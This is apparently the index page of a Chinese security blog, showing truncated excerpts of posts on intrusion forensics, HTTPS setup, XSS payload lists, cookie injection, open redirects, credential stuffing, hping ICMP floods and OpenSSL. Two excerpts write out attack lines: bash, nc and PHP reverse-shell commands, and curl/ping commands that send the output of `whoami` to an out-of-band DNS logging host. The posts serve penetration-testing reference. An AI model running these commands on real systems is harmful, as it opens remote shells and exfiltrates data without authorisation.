nextdoor6的博客

0x01 攻击入口的查找首先我们分析可能遭到攻击的服务。根据服务器上面正在开启的服务，总结了如下服务可能遭受攻击。有开放的22端口ssh服务,开放80端口的http服务，以及开防3306端口mysql服务等。经过查看mysql日志，发现攻击时段并没有被攻击的日志，而且mysql数据库禁止外部ip进行连接的，所以我们排除了从mysql数据库攻击的行为。对http服务的日志进行查找，发现23日对h

今天摸索了下 HTTPS 的证书生成，以及它在 Nginx 上的部署。由于博客托管在 github 上，没办法部署证书，先记录下，后续有需要方便快捷操作。本文的阐述不一定完善，但是可以让一个初学者了解大致的原理，同时跟着操作可以为自己的博客/网站部署一个 HTTPS 证书。网站部署 HTTPS 的重要性看看下面，部分电信用户访问京东首页的时候，会看到右下角有一个浮动广告

常用web漏洞测试的payload整理，把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来，供大家测试时参考。[反射型xss][在html形成]"'>document.title="[random]";document.title="[random]";[在js形成]document.title="[random]";//;document.titl

0x01 什么是cookie?主要是验证用户的身份的唯一标识。0x02 cookie注入的原理是什么？既然是cookie注入，不管是http，还是https协议，其实就是对cookie进行的伪造，修改，达到欺骗服务器目的。0x03 http中cookie伪造的常见场景1.利用xss盗取用户cookie，盗取cookie后可以直接在客户端伪造cookie进行登陆。

今天某广告联盟说来自我们网站的流量有不良的流量，由于流量要跳转到广告联盟进行统计，广告联盟在跳到相应的网站。为了提高不良网站搜索排名性，所以攻击者就利用跳转形式的链接进行seo优化。下面由于url的跳转是开放的，且很难去做校验，所以被攻击者有机可乘。http://www.ad110.com/gotourl.asp?id=2391&url=http://www.baidu.com

由于很多大的网上的数据库泄露，导致了很多黑产都利用撞库的手法拿到了很多普通用户的用户密码，这是用户都可以正常的进行登录，虽然公司会要求提示用户改密码，但是还是有很多的用户没有对原密码和简单的密码进行更改，原来也发现了公司不断被人刷注册用户，虽然一直在刷，但是不知道究竟有什么用处。处理这个事件的过程中发现可以卖钱，哈哈。淘宝还真有出售大量账号的。搜索了一下，1角到1元不等，X，每天是不是

第一部分，hping2的安装0x01 首先是libpcap的安装如果安装bison依赖包运行如下命令apt-get install bison需要安装flex-2.6.0安装包，版本其他应该可以下载地址 http://flex.sourceforge.net/执行命令如下tar  -xvf   flex-2.6.0.tar.b

ICMP常用的攻击的三种方式先看一下ip报文的结构吧。直接icmp协议flood攻击直接使用自己的机器去攻击别人，这要求有足够的带宽。直接攻击会 暴露自己IP地址，一般不常见。简单示意图： ICMP 攻击者[IP=1.1.1.1]---------->受害者[截获攻击者IP=1.1.1.1]==>换IP回来反击利用hping3的命令格式： hping3

直接利用linux上的bash进行反弹nc本地监听nc -l -p port -vvbase反弹bash -i >& /dev/tcp/ownip/port 0>&1利用其他服务器运行环境反弹，比如php，python等。nc本地监听nc -l -p port -vvvphp -r '$sock=fsockopen("10.0.0.1",1234);exec

0x00 Command Executioni. *nix:curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj.ceye.ioii. windowsping %USERNAME%.b182oj.ceye.io0x01 SQL InjectionFrom http://docs.

OpenSSL 是一个开源项目，其组成主要包括一下三个组件：openssl：多用途的命令行工具libcrypto：加密算法库libssl：加密模块应用库，实现了ssl及tlsopenssl可以实现：秘钥证书管理、对称加密和非对称加密 。1、对称加密对称加密需要使用的标准命令为 enc ，用法如下：openssl enc -ci